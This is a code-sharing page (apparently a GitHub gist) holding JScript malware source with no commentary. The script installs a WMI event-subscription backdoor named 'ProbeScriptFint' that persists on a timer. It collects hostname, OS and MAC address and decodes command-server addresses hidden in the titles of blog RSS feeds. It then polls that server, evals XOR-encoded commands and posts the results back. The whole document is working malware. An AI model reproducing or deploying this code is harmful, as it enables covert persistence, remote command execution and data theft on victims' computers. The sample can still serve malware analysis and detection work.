Instantly share code, notes, and snippets.

Embed
What would you like to do?
function e(e, t) {
var n = "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription",
r = GetObject(n + ":ActiveScriptEventConsumer").spawninstance_();
(r.name = "ProbeScriptFint"), (r.scriptingengine =
"javascript"), (r.ScriptText =
t +
"var sOwner='" +
e +
"';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\"%PCI%\\\" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\"scrcons.exe\\\"'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i<vals.length;i++){result+=String.fromCharCode(vals[i]^keycode);}return result;},circleDecode:function(sc){var base=sc.charCodeAt(0);var s=base-32;var r='';for(var i=1;i<sc.length;i++){var nc=sc.charCodeAt(i)-s-i+1;if(nc<32){nc=126+(nc-32)%94;}r+=String.fromCharCode(nc);}return r;},MainLoop:function(){$.oHttp=new $._x('Microsoft.XmlHttp');var feedUrlArry=$.sFeedUrl.split(';');var start=new Date();var oXml=new ActiveXObject('MSXML2.DOMDocument.3.0');for(var n=0;n<feedUrlArry.length;n++){var UrlList=new Array();var URLnum=0;try{var tstr=feedUrlArry[n].match('http://.*?\\\\.php');if(tstr!=null){UrlList[URLnum++]=tstr;}else{$.oHttp.Open('GET',feedUrlArry[n],false);$.oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5');$.oHttp.Send();var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');var re=/<title>@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i<titleList.length;i++){try{oXml.loadXML(titleList[i]);var container=oXml.getElementsByTagName('title');var tmpstr=container[0].text.match('@(.*)@');UrlList[URLnum++]=$.circleDecode(tmpstr[1]);}catch(e){}}}for(var Urlindex=0;Urlindex<UrlList.length;Urlindex++){$.sXmlUrl=UrlList[Urlindex];var runnum=360;while(runnum-->0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i<container.length;i++){if(container[i].getAttribute('id')=='0a552b5a4352'){commands=eval('('+container[i].text+')').command;}}}catch(e){}if(commands!=null){var commandresult='';for(var i=0;i<commands.length;i++){var result='no response';try{result=eval($.Decode(commands[i].value));}catch(e){}if(i>0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();");
var i = r.Put_();
(r = GetObject(
n + ":__IntervalTimerInstruction"
).spawninstance_()), (r.Timerid =
"ProbeScriptFint"), (r.IntervalBetweenEvents = 6e3), r.Put_(), (r = GetObject(
n + ":__EventFilter"
).spawninstance_()), (r.name = "ProbeScriptFint"), (r.Query =
'select * from __timerevent where timerid="ProbeScriptFint"'), (r.QueryLanguage =
"WQL");
var s = r.Put_();
return (r = GetObject(
n + ":__FilterToConsumerBinding"
).SpawnInstance_()), (r.Consumer = i.path), (r.Filter = s.path), r.Put_(), "";
}
e(
"XDD",
'var sXmlUrl="http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss";'
);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment